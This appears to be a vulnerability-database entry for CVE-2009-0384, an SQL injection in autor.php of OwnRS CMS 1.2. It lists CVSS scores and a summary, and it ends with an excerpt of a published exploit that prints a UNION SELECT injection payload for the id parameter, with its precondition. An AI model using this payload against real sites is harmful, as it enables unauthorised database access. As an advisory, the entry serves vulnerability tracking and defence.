6.8
CVSSv2

CVE-2009-0384

Published: 02/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in autor.php in OwnRS CMS 1.2 allows remote malicious users to execute arbitrary SQL commands via the id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

adam tomecek ownrs 1.2

Exploits

#OwnRS CMS (autorphp) SQL Injection Vulnerability #Author: nuclear #download: sourceforgenet/project/showfilesphp?group_id=230742 #vuln: localhost/[path]/autorphp?id=' union select 1,2,3,4,5,@@version,7,8,9 ' #required: magic_quotes_gpc == off; #greetz Mi4night, cAs, zYzTeM, THE_MAN, Pepe, I-O-W-A,Digitalfortress, DiGita ...